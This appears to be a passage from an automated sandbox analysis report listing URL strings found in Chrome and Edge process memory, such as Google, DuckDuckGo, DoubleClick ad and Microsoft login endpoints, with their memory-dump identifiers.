Source: chrome.exe, 0000002C.00000002.172377361676.00000C6400E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_defaultt
Source: chrome.exe, 0000002C.00000002.172370962613.00000C64003A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/settings
Source: chrome.exe, 0000002C.00000002.172380279212.00000C640129C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/lfhs=2
Source: chrome.exe, 0000002C.00000002.172374970740.00000C6400AC0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172814089762.00007B1C00E1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 0000002C.00000002.172374970740.00000C6400AC0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172814089762.00007B1C00E1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: chrome.exe, 0000002C.00000002.172377043074.00000C6400D9C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172813871477.00007B1C00DE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chrome.exe, 0000002C.00000002.172374970740.00000C6400AC0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172814089762.00007B1C00E1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 0000002C.00000002.172374970740.00000C6400AC0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172814089762.00007B1C00E1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://eicar.org/
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377043074.00000C6400D9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: chrome.exe, 0000002C.00000002.172377043074.00000C6400D9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=searchTerms
Source: chrome.exe, 00000017.00000003.169486966290.00000D7401A2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169488638516.00000D7401A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169486687819.00000D7401A08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169489047291.00000D7401AA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169487814047.00000D7401A5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169488804802.00000D7401AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169488212575.00000D7401A70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169487213251.00000D7401A30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169488387108.00000D7401A78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169489208657.00000D7401AB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169487441738.00000D7401A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169488002818.00000D7401A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169435116809.00000D7000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172305669612.00000C6401B5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172305329602.00000C6401B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172304347144.00000C6401B10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172304106720.00000C6401B0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172303148142.00000C6401AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172305100980.00000C6401B4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172305516384.00000C6401B54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172258011779.00000C6000514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000017.00000003.169480138143.00000D740198C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169485746828.00000D70006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172298155794.00000C6401A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297691714.00000C6401A2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172301774383.00000C60006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000017.00000003.169435116809.00000D7000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172258011779.00000C6000514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 0000002C.00000002.172368114920.00000C6000698000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-query.fastly-edge.com/htt
Source: chrome.exe, 00000017.00000003.169486966290.00000D7401A2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169488638516.00000D7401A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169486687819.00000D7401A08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169489047291.00000D7401AA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169487814047.00000D7401A5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169488804802.00000D7401AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169488212575.00000D7401A70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169487213251.00000D7401A30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169488387108.00000D7401A78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169489208657.00000D7401AB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169487441738.00000D7401A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169488002818.00000D7401A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169435116809.00000D7000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172305669612.00000C6401B5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172305329602.00000C6401B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172304347144.00000C6401B10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172304106720.00000C6401B0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172303148142.00000C6401AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172305100980.00000C6401B4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172305516384.00000C6401B54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172258011779.00000C6000514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000017.00000003.169480138143.00000D740198C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169485746828.00000D70006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172298155794.00000C6401A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297691714.00000C6401A2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172301774383.00000C60006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000017.00000003.169435116809.00000D7000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172258011779.00000C6000514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 0000002C.00000003.172258011779.00000C6000514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: msedge.exe, 0000001B.00000002.169652041277.000053D00009C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172368451942.00000C6400004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379241276.00000C6401188000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172804037462.00007B1C00088000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: chrome.exe, 0000002C.00000002.172380455425.00000C64012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374714954.00000C6400A98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net
Source: chrome.exe, 00000017.00000003.169479433883.00000D740124C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169479337904.00000D740196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172383543045.00000C6401640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380455425.00000C64012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374714954.00000C6400A98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/
Source: chrome.exe, 00000017.00000003.169479433883.00000D740124C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169479337904.00000D740196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172383543045.00000C6401640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380455425.00000C64012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374714954.00000C6400A98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&adk=181227
Source: chrome.exe, 00000017.00000003.169479433883.00000D740124C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169479337904.00000D740196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169451513999.00000D7400A80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172383543045.00000C6401640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272281153.00000C6400A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380455425.00000C64012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374714954.00000C6400A98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&h=280&slot
Source: chrome.exe, 0000002C.00000002.172380455425.00000C64012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374714954.00000C6400A98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&h=90&slotn
Source: chrome.exe, 00000017.00000003.169479433883.00000D740124C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169479337904.00000D740196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172383543045.00000C6401640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380455425.00000C64012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374714954.00000C6400A98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
Source: chrome.exe, 00000017.00000003.169479433883.00000D740124C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169479337904.00000D740196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172383543045.00000C6401640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380455425.00000C64012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374714954.00000C6400A98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/si
Source: chrome.exe, 00000017.00000003.169479433883.00000D740124C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169479337904.00000D740196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172383543045.00000C6401640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380455425.00000C64012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374714954.00000C6400A98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/html/r20210916/r20110914/zrt_lookup.html?fsb=1#RS-0-&adk=
Source: chrome.exe, 00000017.00000003.169479433883.00000D740124C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169479337904.00000D740196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169451513999.00000D7400A80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172383543045.00000C6401640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272281153.00000C6400A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380455425.00000C64012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374714954.00000C6400A98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/html/r20210916/r20190131/zrt_lookup.html
Source: chrome.exe, 00000017.00000003.169479433883.00000D740124C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169479337904.00000D740196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172383543045.00000C6401640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380455425.00000C64012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374714954.00000C6400A98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/xbbe/pixel?d=CICfxAEQ7KXQkAIY7dHaqQEwAQ&v=APEucNV8Higyb1mdtfCkDQ
Source: chrome.exe, 0000002C.00000002.172374241722.00000C64009DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleusercontent.com/
Source: chrome.exe, 00000017.00000003.169436072801.00000D70005CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169435858432.00000D70005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169435933070.00000D70005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172299941373.00000C6401EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172300088772.00000C6401EC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172259076753.00000C60005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172259282498.00000C60005CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172258979056.00000C60005AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs
Source: chrome.exe, 00000017.00000003.169480138143.00000D740198C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169485746828.00000D70006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172298155794.00000C6401A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297691714.00000C6401A2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172301774383.00000C60006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs27
Source: chrome.exe, 00000017.00000003.169480138143.00000D740198C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172298155794.00000C6401A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297691714.00000C6401A2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: chrome.exe, 00000017.00000003.169436072801.00000D70005CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169435858432.00000D70005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169435933070.00000D70005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172259076753.00000C60005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172259282498.00000C60005CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172258979056.00000C60005AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugsp_
Source: chrome.exe, 00000017.00000003.169452284058.00000D7401094000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379060964.00000C640114C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272815679.00000C640114C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172273182443.00000C640114C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000017.00000003.169452284058.00000D7401094000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379060964.00000C640114C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272815679.00000C640114C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172273182443.00000C640114C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/292285899
Source: chrome.exe, 00000017.00000003.169452284058.00000D7401094000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379060964.00000C640114C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272815679.00000C640114C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172273182443.00000C640114C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/349489248
Source: chrome.exe, 0000002C.00000002.172379307959.00000C64011A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378699881.00000C6401004000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292
Source: chrome.exe, 0000002C.00000002.172376198228.00000C6400C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381586361.00000C6401438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172376929627.00000C6400D6C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172475474020.00007B1C00710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000017.00000003.169458953896.00000D74017C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169459052596.00000D7400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458834362.00000D7400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278431909.00000C6401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278265359.00000C6400540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278586768.00000C6400604000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/gen204
Source: chrome.exe, 00000017.00000003.169458953896.00000D74017C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169459052596.00000D7400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458834362.00000D7400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278431909.00000C6401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278265359.00000C6400540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278586768.00000C6400604000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000017.00000003.169458953896.00000D74017C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169459052596.00000D7400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458834362.00000D7400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278431909.00000C6401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278265359.00000C6400540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278586768.00000C6400604000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000017.00000003.169458953896.00000D74017C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169459052596.00000D7400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458834362.00000D7400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278431909.00000C6401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278265359.00000C6400540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278586768.00000C6400604000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 0000002C.00000002.172368114920.00000C6000698000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload
Source: chrome.exe, 00000017.00000003.169485746828.00000D70006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172301774383.00000C60006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: chrome.exe, 00000017.00000003.169478356679.00000D740182C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169451513999.00000D7400A80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380514944.00000C64012EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172277636962.00000C6400488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172369624469.00000C6400164000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172275070066.00000C6400254000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172271372813.00000C640048C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172280107241.00000C6400488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172277580399.00000C6400484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380580647.00000C6401304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272281153.00000C6400A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172387615935.00000C6401F31000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370776333.00000C6400376000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370269683.00000C6400254000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172368575281.00000C6400030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380279212.00000C640129C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377931287.00000C6400EB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370586589.00000C6400320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172273433460.00000C6400488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172372493421.00000C640079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172371362332.00000C6400488000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: chrome.exe, 00000017.00000003.169478356679.00000D740182C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380514944.00000C64012EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172277636962.00000C6400488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172369624469.00000C6400164000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172382836385.00000C6401584000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172280107241.00000C6400488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172277580399.00000C6400484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380580647.00000C6401304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380225929.00000C640128C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172387615935.00000C6401F31000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370776333.00000C6400376000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377931287.00000C6400EB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172273433460.00000C6400488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172371362332.00000C6400488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172787218433.00000123A9000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378699881.00000C6401004000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/0
Source: chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378699881.00000C6401004000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/0BJP
Source: chrome.exe, 0000002C.00000002.172380173917.00000C6401280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306401&rver=7.0.6738.0&wp=M
Source: chrome.exe, 0000002C.00000002.172380019331.00000C6401260000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380279212.00000C640129C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377931287.00000C6400EB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370586589.00000C6400320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272815679.00000C640115F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172273433460.00000C6400488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172372493421.00000C640079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172371362332.00000C6400488000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=op
Source: chrome.exe, 0000002C.00000002.172380019331.00000C6401260000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380279212.00000C640129C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377662836.00000C6400E64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/post.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=openid
Source: chrome.exe, 0000002C.00000002.172380019331.00000C6401260000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-
